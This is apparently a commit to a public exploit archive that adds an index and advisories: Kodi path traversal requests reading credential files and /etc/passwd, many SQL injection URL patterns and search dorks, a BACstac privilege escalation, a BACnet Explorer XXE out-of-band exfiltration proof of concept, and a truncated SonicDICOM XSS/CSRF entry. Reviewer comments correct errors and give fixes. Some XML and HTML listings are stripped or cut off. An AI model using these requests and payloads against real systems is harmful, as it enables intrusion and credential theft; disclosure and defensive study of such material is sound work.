diff --git a/files.csv b/files.csv
index 317ce272d..9c65467dd 100644
--- a/files.csv
+++ b/files.csv
@@ -8790,6 +8790,8 @@ id,file,description,date,author,platform,type,port
 41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
 41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
 41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
+41320,platforms/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Privilege Escalation",2017-02-12,LiquidWorm,windows,local,0
+41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37228,3 +37230,20 @@ id,file,description,date,author,platform,type,port
 41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
 41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
+41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
+41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
+41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
+41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
+41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
diff --git a/platforms/linux/webapps/41312.txt b/platforms/linux/webapps/41312.txt
new file mode 100755
index 000000000..5ab02362f
--- /dev/null
+++ b/platforms/linux/webapps/41312.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Kodi - Local File Inclusion
+# Date: 12 February 2017
+# Exploit Author: Eric Flokstra
+# Vendor Homepage: https://kodi.tv/
+# Software Link: https://kodi.tv/download/
+# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
+# Tested on: Linux
+
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation. Chorus is a web interface
+for controlling and interacting with Kodi. It is hosted by the Kodi
+installation.
+
+The web interface loads a thumbnail of an image, video or add-on when
+selecting a category in the left menu with the following request:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
+
+Insufficient validation of user input is performed on this URL resulting
+in a local file inclusion vulnerability. This enables attackers
+to retrieve arbitrary files from the filesystem by changing the location
+after the '/image/image%3A%2F%2F’ part.
+
+<--Examples-->
+
+1) If Kodi is connected to a NAS the following request can be used to obtain plain text SMB credentials:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
+
+Response:
+
+smb://192.168.1.15/smb://username:password@192.168.1.15//share
+
+2) Request to retrieve the content of /etc/passwd:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
+
+Response:
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+...
\ No newline at end of file
diff --git a/platforms/php/webapps/41313.txt b/platforms/php/webapps/41313.txt
new file mode 100755
index 000000000..59699e9d4
--- /dev/null
+++ b/platforms/php/webapps/41313.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: WhizBiz - Business Directory CMS v1.9 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://webhelios.com/
+# Software Buy: https://codecanyon.net/item/whizbiz-business-directory-cms/12931569
+# Demo: http://whizbiz.webhelios.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/results/plainkey=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41314.txt b/platforms/php/webapps/41314.txt
new file mode 100755
index 000000000..c991be789
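Review bot: The title line `+# Exploit Title: Kodi - Local File Inclusion` disagrees with the index entry this same commit adds to files.csv (`Kodi 17.1 - Arbitrary File Disclosure`), and the behaviour shown — the server returning passwords.xml and /etc/passwd verbatim — is path traversal / arbitrary file read rather than inclusion, so the title should follow the CSV, e.g. `+# Exploit Title: Kodi 17.1 - Arbitrary File Disclosure (Path Traversal)`. The closing quote in `+after the '/image/image%3A%2F%2F’ part.` is a mis-encoded typographic apostrophe and should be a plain `'`. The advisory names no fixed version and no remediation; it would help defenders to state the expected fix on the image endpoint — decode once, canonicalize the resulting path, and reject anything that resolves outside the allowed media and add-on roots — and to add the patched Kodi version once it is known. The second example's leading `%2e%2e` (the traversal) is presumably the variable part the first paragraph refers to; saying so explicitly would make the description and the examples line up.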
--- /dev/null
+++ b/platforms/php/webapps/41314.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: TI Online Examination System v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://textusintentio.com/
+# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
+# Demo: http://oesv2.textusintentio.com/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
+# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41315.txt b/platforms/php/webapps/41315.txt
new file mode 100755
index 000000000..ce5824ed9
--- /dev/null
+++ b/platforms/php/webapps/41315.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Viavi Real Estate - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/viavi-real-estate/11217313
+# Demo: http://viavilab.com/codecanyon/real_estate_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property-detail.php?pid=[SQL]
+# http://localhost/[PATH]/buysalerent.php?sort=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41316.txt b/platforms/php/webapps/41316.txt
new file mode 100755
index 000000000..4086d7c38
--- /dev/null
+++ b/platforms/php/webapps/41316.txt
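Review bot: In 41314.txt the line `+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]` is listed twice (as the first and the last of the four affected URLs); the duplicate should be dropped or replaced with whichever distinct endpoint was meant. The same file says `+# Login as student user` but the files.csv description does not mention that the issue is post-authentication, which is worth carrying into the index entry so the severity is read correctly.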
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Viavi Movie Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/movie-review/12729570
+# Demo: http://viavilab.com/codecanyon/movie_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/genres.php?id=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41317.txt b/platforms/php/webapps/41317.txt
new file mode 100755
index 000000000..5a7a47b4e
--- /dev/null
+++ b/platforms/php/webapps/41317.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Viavi Product Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/product-review/12406163
+# Demo: http://viavilab.com/codecanyon/product_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41318.txt b/platforms/php/webapps/41318.txt
new file mode 100755
index 000000000..4cd42b55b
--- /dev/null
+++ b/platforms/php/webapps/41318.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Quadz School Management System v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://awardcorporation.com/
+# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
+# Demo: http://mass.awardcorporation.com/
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
+# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41319.txt b/platforms/php/webapps/41319.txt
new file mode 100755
index 000000000..98134ebca
--- /dev/null
+++ b/platforms/php/webapps/41319.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://endavi.com/
+# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
+# Demo: http://endavi.com/dhrpro_demo/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/list.php?entries=[SQL]
+# http://localhost/[PATH]/edit.php?entries=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41322.txt b/platforms/php/webapps/41322.txt
new file mode 100755
index 000000000..48cd5e13d
--- /dev/null
+++ b/platforms/php/webapps/41322.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisPetitions 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onispetitions/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41323.txt b/platforms/php/webapps/41323.txt
new file mode 100755
index 000000000..fe2ee65ee
--- /dev/null
+++ b/platforms/php/webapps/41323.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisQuotes 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/news-display/quotes/onisquotes/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41324.txt b/platforms/php/webapps/41324.txt
new file mode 100755
index 000000000..876d00aa2
--- /dev/null
+++ b/platforms/php/webapps/41324.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component onisMusic 2 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/onismusic/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:option=com_onismusic
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41325.txt b/platforms/php/webapps/41325.txt
new file mode 100755
index 000000000..72ccc868b
--- /dev/null
+++ b/platforms/php/webapps/41325.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Sponsor Wall 7.0 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?oprion=com_sponsorwall
+# Tested on: Linux
+
+# POC :
+# wallid Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41326.txt b/platforms/php/webapps/41326.txt
new file mode 100755
index 000000000..5961c6174
--- /dev/null
+++ b/platforms/php/webapps/41326.txt
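Review bot: In 41325.txt the line `+# Google Dork : inurl:index.php?oprion=com_sponsorwall` misspells the query-string key; the request on the POC line below uses `option=`, so the dork line should read `+# Google Dork : inurl:index.php?option=com_sponsorwall`. The sibling files in this commit (41324, 41326, 41327) spell it correctly, so this is the only one affected.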
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Vik Booking 1.7 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extension/vik-booking/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_vikbooking
+# Tested on: Linux
+
+# POC :
+# room_ids[0] Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41327.txt b/platforms/php/webapps/41327.txt
new file mode 100755
index 000000000..eb5a70da7
--- /dev/null
+++ b/platforms/php/webapps/41327.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Soccer Bet 4.1.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_soccerbet
+# Tested on: Linux
+
+# POC :
+# Cat Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/windows/local/41320.txt b/platforms/windows/local/41320.txt
new file mode 100755
index 000000000..eb426b44e
--- /dev/null
+++ b/platforms/windows/local/41320.txt
@@ -0,0 +1,101 @@
+Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
+
+
+Vendor: Cimetrics, Inc.
+Product web page: https://www.cimetrics.com
+Affected version: 6.2f
+
+Summary: BACstac belongs to product BACstac(TM) Networking Software and
+was developed by company Cimetrics Inc. Cimetrics is excited to announce
+a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
+The Cimetrics BACstac saves man-years of development when your company needs
+to create a BACnet solution ! Our software team has created a set of BACnet
+libraries which greatly simplify the task of interfacing to BACnet.
+
+Even the largest companies in the HVAC industry use our code because it is
+a very complex and time consuming task keeping up with the ongoing changes
+that are taking place in the BACnet committees. For example, many hundreds
+of protocol modifications, requirements, and enhancements have taken place
+in just the past year. By purchasing the Cimetrics BACstac solution, we do
+the compatibility coding and testing. This typically saves man-years of
+software developer time EVERY YEAR !
+
+Desc: The application suffers from an unquoted search path issue impacting
+the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
+routing service solution. This could potentially allow an authorized but non-privileged
+local user to execute arbitrary code with elevated privileges on the system.
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+BACstac also provides a named pipe used for IPC connection between a BACstac
+application and the BACstac service.
+
+The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
+IPC mechanism was chosen to allow portability to embedded systems, and it uses a
+fixed number of slots. The slots are recycled when an application stops running.
+
+With Object-based multiplexing, Service requests that identify a particular Object
+(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
+using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
+the BACstac API.
+
+A number of BACstac protocol stack run-time configuration parameters are stored
+in the Windows Registry. These values are created and initialized when the protocol
+stack is installed. The registry entries are not completely removed when the protocol
+stack is uninstalled (this is standard behaviour for .INF files). The Registry
+entries are located in:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
+
+The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
+one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
+
+The vulnerability exist due to the improper permissions, with the 'F' flag (Full)
+for 'Everyone' group.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5397
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
+
+
+13.12.2016
+
+--
+
+
+C:\>sc qc bacstac
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: bacstac
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : BACstac Protocol
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>
+C:\>accesschk.exe \pipe\bacstac
+
+Accesschk v6.02 - Reports effective permissions for securable objects
+Copyright (C) 2006-2016 Mark Russinovich
+Sysinternals - www.sysinternals.com
+
+\\.\Pipe\bacstac
+ RW Everyone
+
+C:\>
diff --git a/platforms/windows/local/41321.txt b/platforms/windows/local/41321.txt
new file mode 100755
index 000000000..f931e0495
--- /dev/null
+++ b/platforms/windows/local/41321.txt
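Review bot: The claim `+The vulnerability exist due to the improper permissions, with the 'F' flag (Full)` / `+for 'Everyone' group.` is not supported by the evidence the advisory itself pastes — accesschk reports `RW Everyone` on `\\.\Pipe\bacstac`, i.e. read/write, not full control — so the text should say "read and write access for the 'Everyone' group" (and `exist` should be `exists`). The advisory also runs two separate weaknesses together: the Desc paragraph is about an unquoted service binary path (and the `sc qc` output does confirm `BINARY_PATH_NAME` is an unquoted path containing spaces), while the named-pipe DACL is an independent finding with a different impact and fix; listing them as two numbered items would make the severity of each clear. Neither finding comes with a remediation — quoting the service binary path in the service configuration, and restricting the pipe's DACL so that only the intended local client accounts rather than Everyone can write to it, are the obvious ones — and no fixed version is named; the Summary notes BACstac 6.8 exists but does not say whether it is affected, which defenders will want stated explicitly.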
@@ -0,0 +1,55 @@ +Cimetrics BACnet Explorer 4.0 XXE Vulnerability + + +Vendor: Cimetrics, Inc. +Product web page: https://www.cimetrics.com +Affected version: 4.0.0.0 + +Summary: The BACnet Explorer is a BACnet client application that +helps auto discover BACnet devices. + +Desc: BACnetExplorer suffers from an XML External Entity (XXE) +vulnerability using the DTD parameter entities technique resulting +in disclosure and retrieval of arbitrary data on the affected node +via out-of-band (OOB) attack. The vulnerability is triggered when +input passed to the xml parser is not sanitized while parsing the +xml project file. + +Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1 + mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR + BACstac Library: 1.5.6116.0 + BACstac Service: 6.8.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5398 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php + + +30.01.2017 + +-- + +Open file evil.xml: + + + +%remote; +%root; +%oob;]> + + +xxe.xml on the web server: + + + "> + + +pyhon -m SimpleHTTPServer 8080 + +lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 - +lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 - diff --git a/platforms/windows/webapps/41309.html b/platforms/windows/webapps/41309.html new file mode 100755 index 000000000..def772549 --- /dev/null +++ b/platforms/windows/webapps/41309.html 
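Review bot: `+pyhon -m SimpleHTTPServer 8080` is a typo for `python -m SimpleHTTPServer 8080` (that module name is Python 2 only, which is worth noting next to it). The evil.xml and xxe.xml listings between `+Open file evil.xml:` and the server log have lost their markup on this page — only `%remote;`, `%root;`, `%oob;]>` and a stray `">` survive — so the PoC is not readable from this text; presumably the committed file carries the full DTD, but that should be checked. The advisory gives no remediation; since the tested build is .NET (the `mscorlib.dll` line), the fix to state is to load project files with DTD processing disabled and no external resolver (XmlReaderSettings with DtdProcessing set to Prohibit and XmlResolver set to null), and to name the fixed Explorer version once available.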
@@ -0,0 +1,78 @@ +SonicDICOM PACS 2.3.2 Multiple Stored Cross-Site Scripting Vulnerabilities + + +Vendor: JIUN Corporation +Product web page: https://www.sonicdicom.com +Affected version: 2.3.2 and 2.3.1 + +Summary: SonicDICOM is PACS software that combines the capabilities of +DICOM Server with web browser based DICOM Viewer. + +Desc: The application suffers from multiple stored XSS vulnerabilities. +Input passed to several API POST parameters is not properly sanitised +before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context +of an affected site. + +Tested on: Microsoft-HTTPAPI/2.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5394 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5394.php + +22.11.2016 + +-- + + +CSRF Stored XSS via value parameter in settings API: +---------------------------------------------------- + + + +
+ + +